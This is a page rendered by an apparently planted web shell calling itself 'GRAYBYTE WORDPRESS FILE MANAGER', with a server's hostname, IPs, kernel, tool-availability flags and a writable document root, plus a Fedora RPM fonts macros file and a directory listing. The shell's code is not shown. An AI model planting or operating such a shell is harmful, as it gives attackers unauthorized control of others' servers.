✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server.blackpussy.asia ​🇻​♯➤ 5.14.0-611.20.1.el9_7.x86_64 #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 163.245.207.76 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.243
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗞 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ mail,mb_send_mail
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/lib/rpm/macros.d//macros.fonts-srpm
# Copyright © 2008-2019 Nicolas Mailhot <nim@fedoraproject.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.

# RPM macros for fonts packages.
#
# SPDX-License-Identifier: GPL-3.0-or-later

## Default directories

# Font installation directory root
%_fontbasedir            /usr/share/fonts

# Master fontconfig configuration directory
# Only needed to avoid a circular directory dependency with the fontconfig
# package — you should *not* use this in fonts packages
%_fontconfig_masterdir   /etc/fonts

# Fontconfig directory for active configuration snippets
%_fontconfig_confdir     /etc/fonts/conf.d

# Fontconfig configuration template directory
# Templates are activated by symlinking in _fontconfig_confdir
%_fontconfig_templatedir /usr/share/fontconfig/conf.avail

# Default contact in font appstream files
# Override in your spec file if it does not apply
%fontcontact             fonts@lists.fedoraproject.org

# Default org in font appstream files
# Override in your spec file if it does not apply
%fontorg                 org.fedoraproject

# Sanitize a font family name that can then serve as rpm package name
# Mandatory parameter: a font family name
%fontrpmname() %{lua:
local fonts = require "fedora.srpm.fonts"
print(fonts.rpmname(rpm.expand("%1")))
}

# Computes rpm variables associated with a font sub(package)
# There should be no reason to call this macro directly. Arguments:
# -z <number>         read the zth block of definitions, for example
#                     %{fontfamily<number>}
# -a                  process all blocks in one go, instead of using separate
#                     -z calls
# -v                  be verbose
# -f "<shell globs>"  font files to include. Alternatively, set %{fonts<number>}
# -F "<shell globs>"  font files to exclude. Alternatively, set %{fontsex<number>}
# -c "<shell globs>"  fontconfig files to include. Alternatively, set %{fontconfs<number>}
# -C "<shell globs>"  fontconfig files to exclude. Alternatively, set %{fontconfsex<number>}
# -s "<shell globs>"  font appstream files to include. Alternatively, set %{fontappstreams<number>}
# -S "<shell globs>"  font appstream files to exclude. Alternatively, set %{fontappstreamsex<number>}
# -d "<shell globs>"  documentation files to include. Alternatively, set %{fontdocs<number>}
# -D "<shell globs>"  documentation files to exclude. Alternatively, set %{fontdocsex<number>}
# -l "<shell globs>"  licensing files to include. Alternatively, set %{fontlicenses<number>}
# -L "<shell globs>"  licensing files to exclude. Alternatively, set %{fontlicensesex<number>}
%fontenv(z:vf:F:c:C:s:S:d:D:l:L:) %{lua:
local      fonts = require "fedora.srpm.fonts"
local     suffix =  rpm.expand("%{?-z*}")
local    verbose = (rpm.expand("%{-v}") ~= "")
local globvalues = {}
for g,_ in pairs(fonts.globargs) do
  globvalues[g] = rpm.expand("%{?-" .. fonts.globargs[g] .. "*}")
end
fonts.env(suffix, verbose, globvalues)
}

# Create a font (sub)package header. Arguments:
# -z <number>         read the zth block of definitions, for example
#                     %{fontfamily<number>}
# -a                  process all blocks in one go, instead of using separate
#                     -z calls
# -v                  be verbose
# -m                  force main header creation
# -s                  force sub header creation
#                     by itself the macro assumes the zero or nil suffix block
#                     corresponds to the main package header
%fontpkg(z:avms) %{lua:
local      fonts =  require "fedora.srpm.fonts"
local     suffix =  rpm.expand("%{?-z*}")
local processall = (rpm.expand("%{-a}") ~= "") and (rpm.expand("%{-z}") == "")
local    verbose = (rpm.expand("%{-v}") ~= "")
local  forcemain = (rpm.expand("%{-m}") ~= "")
local   forcesub = (rpm.expand("%{-s}") ~= "")
fonts.pkg(forcemain, forcesub, suffix, processall, verbose)
}

# Create a font (sub)metapackage header. Optional arguments:
# -n <name>       use <name> as metapackage name
# -s <variable>   use the content of <variable> as metapackage summary
# -d <variable>   use the content of <variable> as metapackage description
# -z "<numbers>"  restrict metapackaging to <numbers> comma-separated list of
#                 font package suffixes
%fontmetapkg(n:s:d:z:) %{lua:
local        fonts = require "fedora.srpm.fonts"
local         name = rpm.expand("%{?-n*}")
local      summary = rpm.expand("%{?-s*}")
if (summary ~= "") then
           summary = "%{" .. summary .. "}"
end
local  description = rpm.expand("%{?-d*}")
if (description ~= "") then
       description = "%{" .. description .. "}"
end
local     suffixes = rpm.expand("%{?-z*}")
fonts.metapkg(name, summary, description, suffixes)
}

Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]

Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
26 Jun 2026 4.57 AM
root / root
0755
macros.aaa-pyproject-srpm
0.852 KB
4 Apr 2026 9.17 PM
root / root
0644
macros.dist
0.409 KB
19 May 2026 7.33 AM
root / root
0644
macros.dwz
1.764 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.efi-srpm
3.193 KB
17 Sep 2025 7.08 AM
root / root
0644
macros.environment-modules
0.073 KB
14 May 2023 5.11 PM
root / root
0644
macros.fedora-misc
2.424 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.fedora-misc-srpm
1.678 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.firewalld
0.233 KB
4 Aug 2026 8.19 PM
root / root
0644
macros.fonts-srpm
5.167 KB
12 Feb 2022 3.59 AM
root / root
0644
macros.forge
3.248 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.ghc-srpm
0.522 KB
30 Jan 2022 3.59 PM
root / root
0644
macros.go-srpm
9.814 KB
31 Mar 2026 6.33 PM
root / root
0644
macros.java-srpm
0.092 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.kernel-srpm
0.106 KB
17 Sep 2025 7.20 AM
root / root
0644
macros.kmp
4.375 KB
17 Sep 2025 7.11 AM
root / root
0644
macros.ldc-srpm
0.068 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.ldconfig
0.3 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.lua-srpm
0.276 KB
11 Feb 2022 10.12 PM
root / root
0644
macros.mono-srpm
0.177 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.nodejs-srpm
0.316 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.ocaml-srpm
0.728 KB
16 Feb 2022 10.20 AM
root / root
0644
macros.openblas-srpm
0.102 KB
10 Feb 2022 6.48 PM
root / root
0644
macros.perl
5.511 KB
28 Jul 2025 3.48 AM
root / root
0644
macros.perl-srpm
0.842 KB
25 Mar 2022 12.27 PM
root / root
0644
macros.pkgconf
0.06 KB
6 Apr 2023 8.27 PM
root / root
0644
macros.python-srpm
11.134 KB
1 Oct 2024 12.46 PM
root / root
0644
macros.qt5-srpm
0.48 KB
27 Sep 2023 1.05 AM
root / root
0644
macros.rust-srpm
1.345 KB
11 Feb 2022 11.32 AM
root / root
0644
macros.selinux-policy
7.077 KB
4 Apr 2026 9.23 PM
root / root
0644
macros.systemd
6.924 KB
25 Jun 2026 12.24 AM
root / root
0644
macros.systemtap
0.201 KB
4 Apr 2026 9.42 PM
root / root
0644
macros.sysusers
0.335 KB
25 Jun 2026 12.26 AM
root / root
0644
macros.valgrind-srpm
0.124 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.vim
0.039 KB
10 Sep 2026 5.16 PM
root / root
0644
macros.vpath
0.235 KB
17 Sep 2025 7.15 AM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF